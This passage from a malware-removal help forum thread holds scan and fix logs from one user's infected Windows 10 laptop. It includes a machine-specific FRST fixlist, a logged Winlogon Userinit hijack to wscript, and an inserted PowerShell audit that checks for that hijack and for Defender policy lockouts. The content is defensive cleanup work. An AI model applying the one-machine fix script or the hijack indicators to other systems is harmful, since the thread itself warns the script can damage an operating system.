2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.04.14.07
  rootkit: v2016.04.09.01
 
Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16724
RoNiN :: RONIN-LAPTOP [administrator]
 
4/14/2016 7:08:08 PM
mbar-log-2016-04-14 (19-08-08).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 444913
Time elapsed: 1 hour(s), 27 minute(s), 59 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)


#10 Jo*

Jo*

  • Malware Response Team
  • 3,425 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:05:37 PM

Posted 15 April 2016 - 04:15 AM

Going over your logs I noticed that you have p2p program BitTorrent installed.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall the p2p program BitTorrent; however, that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
If you wish to keep it, please do not use it until your computer is cleaned.

---

:step1: Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as FRST / FRST64 (usually your desktop) as fixlist.txt
 
start
CreateRestorePoint:
CloseProcesses:
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job 
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job 
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC 
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat 
C:\PROGRA~1\SHOPPE~1
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File

EmptyTemp:
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST / FRST64 again like we did before, but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt); please post it in your reply.

---

:step2: Run Malwarebytes Anti-Rootkit again: Right-click mbar.exe and select Run As Administrator
  • Scan your system for malware.
  • If malware is found, click on the Cleanup button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • Then please go to the MBAR folder and copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

***


:step3: Double click on AdwCleaner.exe to run the tool again.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove". Look through the scan results and uncheck any entries that you do not wish to remove.
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

***


:step4: Please download Junkware Removal Tool from HERE and save it to your desktop.
Shutdown your antivirus to avoid any potential conflicts.
Double click JRT.exe to run the tool.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • JRT will begin to backup your registry and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, the log JRT.txt is saved on your desktop and will automatically open.
Enable your antivirus!
Post the contents of JRT.txt into your next reply.




***


:step5: How is the computer running now?

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#11 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
  • Local time:04:37 PM

Posted 16 April 2016 - 03:20 PM

:step1:

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-15 18:44:31) Run:5
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job 
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job 
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC 
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat 
C:\PROGRA~1\SHOPPE~1
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
EmptyTemp:
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
MFE_RR => service removed successfully
"C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job" => not found.
"C:\WINDOWS\Tasks\BJZJKCUBLH1.job" => not found.
"C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC" => not found.
"C:\WINDOWS\System32\Tasks\BJZJKCUBLH1" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{369CA7CD-5C89-4F7B-834D-8F15564BB1DC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{369CA7CD-5C89-4F7B-834D-8F15564BB1DC}" => key removed successfully
C:\WINDOWS\System32\Tasks\Rocfokt => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Rocfokt" => key removed successfully
"C:\PROGRA~1\SHOPPE~1" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF19F91F-CBDD-4187-8FA0-9B762E84BFB5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF19F91F-CBDD-4187-8FA0-9B762E84BFB5}" => key removed successfully
C:\WINDOWS\System32\Tasks\Lhsorj => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lhsorj" => key removed successfully
"C:\Users\RoNiN\Desktop\Natephotobomb.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\RoNiN\Desktop\Natephotobomb.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\RoNiN\Desktop\Natephotobomb.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\BBKings Everclear.png" => ":SummaryInformation" ADS not found.
"C:\Users\RoNiN\Downloads\BBKings Everclear.png" => ":Updt_SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\BBKings Everclear.png => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\wddrnote.gif" => ":SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\wddrnote.gif => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\wdid.gif" => ":SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\wdid.gif => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => key removed successfully
EmptyTemp: => 76.6 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 18:45:19 ====
:step2:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.04.16.03
  rootkit: v2016.04.09.01
 
Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16724
RoNiN :: RONIN-LAPTOP [administrator]
 
4/16/2016 12:08:20 PM
mbar-log-2016-04-16 (12-08-20).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 444647
Time elapsed: 1 hour(s), 20 minute(s), 
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 1
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON|userinit (Hijack.UserInit) -> Bad: (wscript,) Good: (userinit.exe) -> Replace on reboot. [86fd555a3d5cfe38743141fbbe4757a9]
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)
 

:step3:

# AdwCleaner v5.111 - Logfile created 16/04/2016 at 13:35:58
# Updated 14/04/2016 by Xplode
# Database : 2016-04-15.1 [Server]
# Operating system : Windows 10 Home  (X64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\adwcleaner_5.111.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cloudfront.net
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\d21r4q0rdzodf.cloudfront.net
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\d3s8xk3etjyeyz.cloudfront.net
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[C2].txt - [3710 bytes] - [09/04/2016 16:19:56]
C:\AdwCleaner\AdwCleaner[C3].txt - [1130 bytes] - [16/04/2016 13:35:58]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3331 bytes] - [08/04/2016 23:29:09]
C:\AdwCleaner\AdwCleaner[S7].txt - [3404 bytes] - [09/04/2016 16:11:57]
C:\AdwCleaner\AdwCleaner[S8].txt - [1685 bytes] - [16/04/2016 13:34:22]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1786 bytes] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.4 (03.14.2016)
Operating System: Windows 10 Home x64 
Ran by RoNiN (Administrator) on Sat 04/16/2016 at 13:47:23.39
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 10 
 
Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder) 
Successfully deleted: C:\Users\RoNiN\AppData\Local\crashrpt (Folder) 
Successfully deleted: C:\Users\RoNiN\AppData\Local\installer (Folder) 
Successfully deleted: C:\Users\RoNiN\Appdata\LocalLow\company (Folder) 
Successfully deleted: C:\WINDOWS\SysWOW64\sho8AC4.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\sho990F.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\shoAF67.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\shoF11A.tmp (File) 
Successfully repaired: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk (Shortcut)
Successfully repaired: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk (Shortcut)
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 04/16/2016 at 13:51:13.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:step5: Running smooth!! Windows Defender is still locked due to 'group policy'.
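Two findings in post #11 are worth checking directly rather than only through the scanners: MBAR flagged the Winlogon userinit value (Bad: wscript, Good: userinit.exe), and Windows Defender reports itself locked by group policy. The PowerShell below is an added, read-only audit written for this thread (not part of the thread or of any of the tools above): it inspects the Winlogon Userinit/Shell chain in both registry views and lists every value under the Windows Defender policy key; the paths are standard Windows locations, and it should be run from an elevated PowerShell.

```powershell
# Added example (not from the thread): read-only audit of the Winlogon logon chain
# and the Windows Defender policy key on the local machine. Run as Administrator.
#
# Background from the MBAR log above: Userinit was reported as "wscript," instead of
# userinit.exe. Userinit is a comma-separated list of programs Winlogon starts at
# logon; the stock entry is userinit.exe, which in turn launches the Shell value
# (explorer.exe). If that chain is replaced by a script host, the desktop never
# appears (the black screen from the opening post) and the script runs at every logon.

$ErrorActionPreference = 'Stop'

# Native 64-bit view and the 32-bit (Wow6432Node) view MBAR flagged.
$winlogonKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon'
)

# Expected binaries, compared by file name only (case-insensitive) so that
# C:\Windows\system32\userinit.exe and %SystemRoot%\system32\userinit.exe both pass.
$expected = @{
    Userinit = 'userinit.exe'
    Shell    = 'explorer.exe'
}

function Test-WinlogonValue {
    param([string]$Key, [string]$Name, [string]$ExpectedExe)

    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if (-not $item) {
        # Absent is normal in the Wow6432Node view of a clean machine.
        return [pscustomobject]@{ Key = $Key; Name = $Name; Value = $null; Status = 'absent' }
    }
    $raw = [string]$item.$Name

    # Split the list, drop empty entries (the stock trailing comma), expand env vars.
    $entries = @($raw -split ',' |
                 ForEach-Object { $_.Trim() } |
                 Where-Object { $_ } |
                 ForEach-Object { [Environment]::ExpandEnvironmentVariables($_) })

    $status = 'ok'
    if ($entries.Count -ne 1) {
        $status = 'extra-entries'      # a second program chained into the logon
    } elseif ([IO.Path]::GetFileName($entries[0].Trim('"')) -ine $ExpectedExe) {
        $status = 'hijacked'           # e.g. "wscript ..." in place of userinit.exe
    }
    [pscustomobject]@{ Key = $Key; Name = $Name; Value = $raw; Status = $status }
}

$results = foreach ($key in $winlogonKeys) {
    foreach ($name in $expected.Keys) {
        Test-WinlogonValue -Key $key -Name $name -ExpectedExe $expected[$name]
    }
}

# Defender's "turned off by group policy" state is driven by values under this key.
# A stand-alone home PC normally has no values here at all, so every entry found is
# something to account for (an administrator's setting or tampering) before it is
# removed.
$defenderPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
$policyHits = @()
if (Test-Path $defenderPolicy) {
    $keys = @(Get-Item $defenderPolicy) + @(Get-ChildItem $defenderPolicy -Recurse)
    foreach ($k in $keys) {
        foreach ($v in $k.GetValueNames()) {
            $policyHits += [pscustomobject]@{ Key = $k.Name; Name = $v; Value = $k.GetValue($v) }
        }
    }
}

'== Winlogon chain (anything other than ok/absent needs attention) =='
$results | Format-Table Status, Name, Value, Key -AutoSize

'== Windows Defender policy values (expected: none on a home PC) =='
if ($policyHits.Count -gt 0) { $policyHits | Format-Table -AutoSize } else { 'none' }
```

The Winlogon report is what to compare against the MBAR line: a clean machine shows ok for both values in the native view and ok or absent in the Wow6432Node view.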


#12 Jo*

Jo*

  • Malware Response Team
  • 3,425 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:05:37 PM

Posted 16 April 2016 - 04:10 PM

Download and run Chrome Software Cleaner

---

Why do you think you have Komodia Rootkit?

Did you uninstall Emsisoft Anti-Malware?

Your logs show 4 user profiles: Which of these user accounts did you create?
Available Profiles:
- RoNiN
- postgres
- DefaultAppPool
- Mcx1-RONIN-LAPTOP

Which user accounts can you see in the User Accounts control panel?

---

Log on to all your user accounts now, without restarting!

FRST / FRST64: run it again.
  • Right-click FRST / FRST64 then click "Run as administrator" (XP users: click Run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Put a check into the box next to Addition.txt and press the Scan button.
  • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory the tool was run from.
  • Please copy and paste both logs in your next reply.
---

Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
